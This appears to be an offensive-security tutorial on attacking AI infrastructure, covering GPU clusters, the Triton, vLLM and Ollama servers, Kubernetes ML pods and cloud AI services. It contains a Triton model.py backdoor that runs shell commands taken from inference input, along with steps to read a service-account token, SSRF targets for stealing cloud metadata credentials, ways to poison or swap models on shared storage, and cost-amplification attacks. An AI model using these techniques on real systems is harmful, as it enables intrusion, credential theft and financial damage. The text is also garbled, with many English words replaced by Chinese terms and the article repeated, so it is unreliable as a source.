AI Infrastructure 利用ation

Expert10 min readUpdated 2026-03-11

Methodology for exploiting GPU clusters, model serving frameworks (Triton, vLLM, Ollama), Kubernetes ML platforms, cloud AI services, and cost amplification attacks.

infrastructure gpu triton vllm ollama kubernetes cloud-ai cost-amplification

AI Infrastructure 利用

AI infrastructure combines traditional attack surfaces with AI-specific concerns: model serving frameworks with unauthenticated APIs, GPU drivers with kernel-level access, multi-tenant 推論 platforms with shared memory, and 雲端 AI services with billing models ripe for cost amplification.

Infrastructure 攻擊 Surfaces

AI infrastructure spans several distinct target categories, each with unique 利用 characteristics.

Model serving frameworks (Triton, vLLM, Ollama) are frequently deployed without 認證, exposing model enumeration, configuration details, and 推論 endpoints. The highest-severity risk is code execution through custom backends -- Triton's Python backend runs arbitrary code during model load and 推論. Unauthenticated management APIs allow loading 攻擊者-controlled models, making any exposed model server a potential foothold into the 推論 infrastructure.

GPU clusters introduce hardware-level attack surfaces absent from traditional infrastructure. Uninitialized GPU memory can contain data from previous tenants (model weights, 訓練資料, API keys). NVLink and NVSwitch fabrics enable peer-to-peer memory access across GPUs if isolation is not enforced. CUDA IPC handles allow cross-process GPU memory access. NVIDIA DCGM management APIs on port 5555 provide cluster-wide GPU control when exposed without 認證.

ML pipelines on Kubernetes commonly over-provision 權限, granting cluster-admin to 訓練 job service accounts. Shared storage mounts (/models, /data, /checkpoints) enable lateral movement from a compromised 訓練 job to production model replacement or 資料投毒. CI/CD systems that automate 訓練 and deployment are high-value targets -- compromising the pipeline produces persistent, automated 後門 injection across all future model versions.

GPU Cluster 攻擊

攻擊 Surface Enumeration

From a compromised container, enumerate the GPU infrastructure:

Component	What to Check	How
GPU hardware & driver	Model, driver version, compute mode, MIG status	`nvidia-smi --query-gpu=name,driver_version,memory.total,compute_mode,mig.mode.current --format=csv`
CUDA version	Known 漏洞 in specific versions	`nvcc --version`
DCGM exposure	DCGM management API on port 5555	TCP connect to `localhost:5555`
NCCL config	Multi-GPU communication settings	Check `NCCL_*` environment variables
NVLink/NVSwitch	Peer-to-peer GPU memory access, isolation gaps	Check for enabled CUDA IPC handles

GPU Memory Side Channels

Memory remnants: Allocate uninitialized GPU memory via torch.empty(1024, 1024, device='cuda') and scan for non-zero values. On shared infrastructure, previous tenants' model weights, 訓練資料, and API keys may be recoverable.

Timing attacks: Measure allocation latency over many iterations. Bimodal distribution in allocation times indicates co-tenant interference, revealing workload patterns and memory pressure.

NVLink/NVSwitch Risks

Risk	Description
Peer-to-peer memory access	NVLink-connected GPUs can access each other's memory if peer access is enabled
NVSwitch fabric	Any-to-any GPU memory access across the fabric
CUDA IPC handles	Shared GPU memory between processes via file descriptors; if 攻擊者 obtains the handle, they read/write another process's GPU memory

Model Serving 漏洞

Reconnaissance Methodology

識別 the serving framework
Probe common endpoints to determine which framework is running.
Framework Health Endpoint Default Port
Triton /v2/health/ready 8000 (HTTP), 8001 (gRPC)
vLLM /health 8000
Ollama /api/tags 11434
Check for 認證
Most model serving frameworks deploy without 認證 by default. 測試 unauthenticated access to model listing and 推論 endpoints.
Enumerate models and configurations
Extract model names, architectures, 輸入/輸出 specs, and backend types. Look for Python backends (code execution) and ensemble pipelines.
測試 for exploitable features
Check model control APIs (load/unload), metrics endpoints (information disclosure), and custom backend execution.

Framework	Health Endpoint	Default Port
Triton	`/v2/health/ready`	8000 (HTTP), 8001 (gRPC)
vLLM	`/health`	8000
Ollama	`/api/tags`	11434

Framework-Specific 攻擊

Triton is the most feature-rich target:

Endpoint	Risk
`GET /v2/models`	Model enumeration without auth
`GET /v2/models/\{name\}/config`	Architecture details, backend type, file paths
`POST /v2/repository/index`	Full model repository listing
Model control API	Load/unload arbitrary models

Critical risk: Triton's Python backend executes arbitrary code. If you can place a model in the repository, model.py runs during 推論:

# model.py in Triton's model repository
class TritonPythonModel:
    def initialize(self, args):
        os.system('id > /tmp/pwned')  # Runs on model load
    def execute(self, requests):
        # Use 推論 輸入 as command channel
        cmd = pb_utils.get_input_tensor_by_name(
            requests[0], 'INPUT').as_numpy()[0].decode()
        輸出 = subprocess.getoutput(cmd)

vLLM exposes an OpenAI-compatible API, typically without 認證:

Check	Endpoint	Risk
Model listing	`GET /v1/models`	Information disclosure
Health/metrics	`GET /metrics`	GPU count, memory, request patterns, architecture
Inference	`POST /v1/chat/completions`	Compute abuse, 系統提示詞 extraction

測試 for 系統提示詞 override by sending a system message that contradicts the deployment's intended prompt.

Ollama binds to localhost by default but is often exposed on 0.0.0.0 with no 認證:

Action	Endpoint	Impact
List models	`GET /api/tags`	Enumeration
Pull models	`POST /api/pull`	Bandwidth/storage abuse
Create models	`POST /api/create`	Custom Modelfile execution
Delete models	`DELETE /api/delete`	Denial of service
Run 推論	`POST /api/generate`	Compute abuse

Kubernetes ML Platform 攻擊

Privilege Escalation from ML Pods

ML pods commonly have excessive 權限. After compromising a 訓練 job, enumerate Kubernetes access:

Read the service account 符元
Check /var/run/secrets/kubernetes.io/serviceaccount/符元. ML platform service accounts are frequently bound to cluster-admin.
Enumerate accessible resources
測試 access to cluster-wide secrets, pods, nodes, namespaces, and deployments using the service account 符元 against the Kubernetes API.
Access shared storage
Check common ML mount points for lateral access.

Shared Storage 攻擊 Paths

Mount Point	Typical Content	利用
`/models`	Shared model registry	Replace production models with trojaned versions
`/data`	Training datasets	Poison 訓練資料
`/checkpoints`	Training checkpoints	Inject backdoored checkpoints
`/artifacts`	MLflow/W&B artifacts	Redirect model deployments
`/home/jovyan`	JupyterHub home directories	Access other users' notebooks and credentials

雲端 AI Service 利用

雲端-Specific 攻擊 Surfaces

雲端 Service	Entry Points	Escalation Paths
AWS SageMaker	Notebook instances (Jupyter + IAM role), 訓練 jobs (S3/ECR access), endpoints (SSRF)	Enumerate endpoints, models, 訓練 jobs; pivot via IAM role
GCP Vertex AI	Notebook instances, custom 訓練 containers, model endpoints	Service account impersonation, GCS bucket access
Azure ML	Compute instances, managed endpoints, datastores	Managed identity abuse, blob storage access

From a compromised SageMaker notebook, enumerate all endpoints (deployed models), models (with S3 artifact paths), and 訓練 jobs (with IAM roles and hyperparameters) via the boto3 SageMaker client.

Cost Amplification 攻擊

攻擊 Vector	Mechanism	Estimated Hourly Cost
GPU 推論 abuse	Max-length requests at max throughput to GPU endpoints	~$360 (10 req/s x $0.01)
Training job spawn	Launch multi-GPU 訓練 jobs via compromised credentials	~$500 per job (10 parallel)
Model download abuse	Repeated downloads of large models to trigger egress charges	~$540 (100GB x 60 downloads x $0.09/GB)
嵌入向量 API abuse	Max-size batches to 嵌入向量 endpoints continuously	Varies by provider

Inference Service SSRF

Model serving endpoints that accept URLs as 輸入 (image classification, web scraping, document processing) are SSRF vectors.

Priority SSRF Targets

Target	URL	What You Get
AWS IMDS	`http://169.254.169.254/latest/meta-data/iam/安全-credentials/`	IAM credentials
GCP metadata	`http://metadata.google.internal/computeMetadata/v1/`	Service account 符元
Azure IMDS	`http://169.254.169.254/metadata/identity/oauth2/符元`	Managed identity 符元
Kubernetes API	`http://kubernetes.default.svc/api/v1/namespaces`	Cluster enumeration
Internal Triton	`http://triton-server.internal:8000/v2/models`	Model enumeration
Internal Ollama	`http://localhost:11434/api/tags`	Local model listing

Knowledge Check

You discover an NVIDIA Triton server exposed without 認證. Which finding represents the highest severity risk?

參考文獻

OWASP Machine Learning 安全 Top 10 — ML infrastructure risks
NVIDIA Triton Inference Server — Model serving infrastructure
Kubernetes 安全最佳實務 (CISA, 2022) — K8s 安全 for ML clusters

AI Infrastructure 利用ation

Expert10 min readUpdated 2026-03-11

Methodology for exploiting GPU clusters, model serving frameworks (Triton, vLLM, Ollama), Kubernetes ML platforms, cloud AI services, and cost amplification attacks.

infrastructure gpu triton vllm ollama kubernetes cloud-ai cost-amplification

AI Infrastructure 利用

Infrastructure 攻擊 Surfaces

AI infrastructure spans several distinct target categories, each with unique 利用 characteristics.

GPU Cluster 攻擊

攻擊 Surface Enumeration

From a compromised container, enumerate the GPU infrastructure:

Component	What to Check	How
GPU hardware & driver	Model, driver version, compute mode, MIG status	`nvidia-smi --query-gpu=name,driver_version,memory.total,compute_mode,mig.mode.current --format=csv`
CUDA version	Known 漏洞 in specific versions	`nvcc --version`
DCGM exposure	DCGM management API on port 5555	TCP connect to `localhost:5555`
NCCL config	Multi-GPU communication settings	Check `NCCL_*` environment variables
NVLink/NVSwitch	Peer-to-peer GPU memory access, isolation gaps	Check for enabled CUDA IPC handles

GPU Memory Side Channels

Timing attacks: Measure allocation latency over many iterations. Bimodal distribution in allocation times indicates co-tenant interference, revealing workload patterns and memory pressure.

NVLink/NVSwitch Risks

Risk	Description
Peer-to-peer memory access	NVLink-connected GPUs can access each other's memory if peer access is enabled
NVSwitch fabric	Any-to-any GPU memory access across the fabric
CUDA IPC handles	Shared GPU memory between processes via file descriptors; if 攻擊者 obtains the handle, they read/write another process's GPU memory

Model Serving 漏洞

Reconnaissance Methodology

識別 the serving framework
Probe common endpoints to determine which framework is running.
Framework Health Endpoint Default Port
Triton /v2/health/ready 8000 (HTTP), 8001 (gRPC)
vLLM /health 8000
Ollama /api/tags 11434
Check for 認證
Most model serving frameworks deploy without 認證 by default. 測試 unauthenticated access to model listing and 推論 endpoints.
Enumerate models and configurations
Extract model names, architectures, 輸入/輸出 specs, and backend types. Look for Python backends (code execution) and ensemble pipelines.
測試 for exploitable features
Check model control APIs (load/unload), metrics endpoints (information disclosure), and custom backend execution.

Framework	Health Endpoint	Default Port
Triton	`/v2/health/ready`	8000 (HTTP), 8001 (gRPC)
vLLM	`/health`	8000
Ollama	`/api/tags`	11434

Framework-Specific 攻擊

Triton is the most feature-rich target:

Endpoint	Risk
`GET /v2/models`	Model enumeration without auth
`GET /v2/models/\{name\}/config`	Architecture details, backend type, file paths
`POST /v2/repository/index`	Full model repository listing
Model control API	Load/unload arbitrary models

Critical risk: Triton's Python backend executes arbitrary code. If you can place a model in the repository, model.py runs during 推論:

# model.py in Triton's model repository
class TritonPythonModel:
    def initialize(self, args):
        os.system('id > /tmp/pwned')  # Runs on model load
    def execute(self, requests):
        # Use 推論 輸入 as command channel
        cmd = pb_utils.get_input_tensor_by_name(
            requests[0], 'INPUT').as_numpy()[0].decode()
        輸出 = subprocess.getoutput(cmd)

vLLM exposes an OpenAI-compatible API, typically without 認證:

Check	Endpoint	Risk
Model listing	`GET /v1/models`	Information disclosure
Health/metrics	`GET /metrics`	GPU count, memory, request patterns, architecture
Inference	`POST /v1/chat/completions`	Compute abuse, 系統提示詞 extraction

測試 for 系統提示詞 override by sending a system message that contradicts the deployment's intended prompt.

Ollama binds to localhost by default but is often exposed on 0.0.0.0 with no 認證:

Action	Endpoint	Impact
List models	`GET /api/tags`	Enumeration
Pull models	`POST /api/pull`	Bandwidth/storage abuse
Create models	`POST /api/create`	Custom Modelfile execution
Delete models	`DELETE /api/delete`	Denial of service
Run 推論	`POST /api/generate`	Compute abuse

Kubernetes ML Platform 攻擊

Privilege Escalation from ML Pods

ML pods commonly have excessive 權限. After compromising a 訓練 job, enumerate Kubernetes access:

Read the service account 符元
Check /var/run/secrets/kubernetes.io/serviceaccount/符元. ML platform service accounts are frequently bound to cluster-admin.
Enumerate accessible resources
測試 access to cluster-wide secrets, pods, nodes, namespaces, and deployments using the service account 符元 against the Kubernetes API.
Access shared storage
Check common ML mount points for lateral access.

Shared Storage 攻擊 Paths

Mount Point	Typical Content	利用
`/models`	Shared model registry	Replace production models with trojaned versions
`/data`	Training datasets	Poison 訓練資料
`/checkpoints`	Training checkpoints	Inject backdoored checkpoints
`/artifacts`	MLflow/W&B artifacts	Redirect model deployments
`/home/jovyan`	JupyterHub home directories	Access other users' notebooks and credentials

雲端 AI Service 利用

雲端-Specific 攻擊 Surfaces

雲端 Service	Entry Points	Escalation Paths
AWS SageMaker	Notebook instances (Jupyter + IAM role), 訓練 jobs (S3/ECR access), endpoints (SSRF)	Enumerate endpoints, models, 訓練 jobs; pivot via IAM role
GCP Vertex AI	Notebook instances, custom 訓練 containers, model endpoints	Service account impersonation, GCS bucket access
Azure ML	Compute instances, managed endpoints, datastores	Managed identity abuse, blob storage access

Cost Amplification 攻擊

攻擊 Vector	Mechanism	Estimated Hourly Cost
GPU 推論 abuse	Max-length requests at max throughput to GPU endpoints	~$360 (10 req/s x $0.01)
Training job spawn	Launch multi-GPU 訓練 jobs via compromised credentials	~$500 per job (10 parallel)
Model download abuse	Repeated downloads of large models to trigger egress charges	~$540 (100GB x 60 downloads x $0.09/GB)
嵌入向量 API abuse	Max-size batches to 嵌入向量 endpoints continuously	Varies by provider

Inference Service SSRF

Model serving endpoints that accept URLs as 輸入 (image classification, web scraping, document processing) are SSRF vectors.

Priority SSRF Targets

Target	URL	What You Get
AWS IMDS	`http://169.254.169.254/latest/meta-data/iam/安全-credentials/`	IAM credentials
GCP metadata	`http://metadata.google.internal/computeMetadata/v1/`	Service account 符元
Azure IMDS	`http://169.254.169.254/metadata/identity/oauth2/符元`	Managed identity 符元
Kubernetes API	`http://kubernetes.default.svc/api/v1/namespaces`	Cluster enumeration
Internal Triton	`http://triton-server.internal:8000/v2/models`	Model enumeration
Internal Ollama	`http://localhost:11434/api/tags`	Local model listing

Knowledge Check

You discover an NVIDIA Triton server exposed without 認證. Which finding represents the highest severity risk?

參考文獻

OWASP Machine Learning 安全 Top 10 — ML infrastructure risks
NVIDIA Triton Inference Server — Model serving infrastructure
Kubernetes 安全最佳實務 (CISA, 2022) — K8s 安全 for ML clusters

AI Infrastructure 利用ation

識別 the serving framework

Check for 認證

Enumerate models and configurations

測試 for exploitable features

Read the service account 符元

Enumerate accessible resources

Access shared storage

Related articles

AI Infrastructure 利用ation

識別 the serving framework

Check for 認證

Enumerate models and configurations

測試 for exploitable features

Read the service account 符元

Enumerate accessible resources

Access shared storage

Related articles